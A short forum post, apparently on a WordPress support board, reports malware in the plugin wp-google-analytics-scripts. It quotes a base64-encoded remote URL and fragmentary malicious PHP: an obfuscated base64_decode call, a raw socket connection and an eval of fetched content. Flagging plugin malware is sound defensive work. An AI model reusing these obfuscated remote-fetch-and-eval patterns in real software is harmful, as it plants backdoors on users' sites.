Virus in plugin wp-google-analytics-scripts
-
Plugin wp-google-analytics-scripts sims to have virus contents. It has text ‘czoyMzoiaHR0cDovL3Bpd2VyLnB3L2FwaS5waHAiOw==’, that decodes to: unserialize(base64_decode(‘czoyMzoiaHR0cDovL3Bpd2VyLnB3L2FwaS5waHAiOw==’) = https://piwer.pw/api.php
Suspicious lines:
$func = ‘b’ . ‘a’ . ‘s’ . ‘e’ . ‘6’ . ‘4’ . ‘_’ . ‘d’ . ‘e’ . ‘c’ . ‘o’ . ‘d’ . ‘e’;$socket = @socket_create(AF_INET, SOCK_STREAM, 0)) && if (($socket = if (($socket = @socket_create(AF_INET, SOCK_STREAM, 0)) && @socket_set_option($socket, SOL_SOCKET, SO_SNDTIMEO, array(‘sec’ => $timeout, ‘usec’ => $timeout * 1000)) && @socket_connect($socket, $host, $port)) {
@eval(‘@chdir(“‘ . addslashes(dirname($file)) . ‘”);?>’ . $content);
dirname(__FILE__) . ‘/temporary_optimization_file.php’
https://www.ads-software.com/plugins/wp-google-analytics-scripts/
- The topic ‘Virus in plugin wp-google-analytics-scripts’ is closed to new replies.